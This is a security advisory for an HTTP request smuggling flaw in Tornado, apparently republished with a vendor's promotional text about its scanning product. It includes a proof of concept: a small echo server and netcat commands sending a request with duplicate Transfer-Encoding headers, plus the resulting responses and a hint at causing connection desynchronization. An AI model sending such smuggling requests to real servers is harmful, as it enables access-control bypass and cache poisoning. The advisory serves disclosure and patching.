GHSA-753j-mpmx-qq6g
MEDIUMInconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado
Blast Radius
tornadoReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
When Tornado receives a request with two Transfer-Encoding: chunked headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. Pound does this.
PoC
- Install Tornado.
- Start a simple Tornado server that echoes each received request's body:
cat << EOF > server.py
import asyncio
import tornado
class MainHandler(tornado.web.RequestHandler):
def post(self):
self.write(self.request.body)
async def main():
tornado.web.Application([(r"/", MainHandler)]).listen(8000)
await asyncio.Event().wait()
asyncio.run(main())
EOF
python3 server.py &
- Send a valid chunked request:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
- Observe that the response is as expected:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1
Z
- Send a request with two
Transfer-Encoding: chunkedheaders:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
- Observe the strange response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0
HTTP/1.1 400 Bad Request
This is because Tornado believes that the request has no message body, so it tries to interpret 1\r\nZ\r\n0\r\n\r\n as its own request, which causes a 400 response. With a little cleverness involving chunk-exts, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.
Impact
Anyone using Tornado behind a proxy that forwards requests containing multiple Transfer-Encoding: chunked headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | tornado | all versions | 6.4.1 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for tornado. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update tornado to 6.4.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-753j-mpmx-qq6g is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-753j-mpmx-qq6g is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-753j-mpmx-qq6g. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-753j-mpmx-qq6g in your dependencies?
O3 detects GHSA-753j-mpmx-qq6g across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.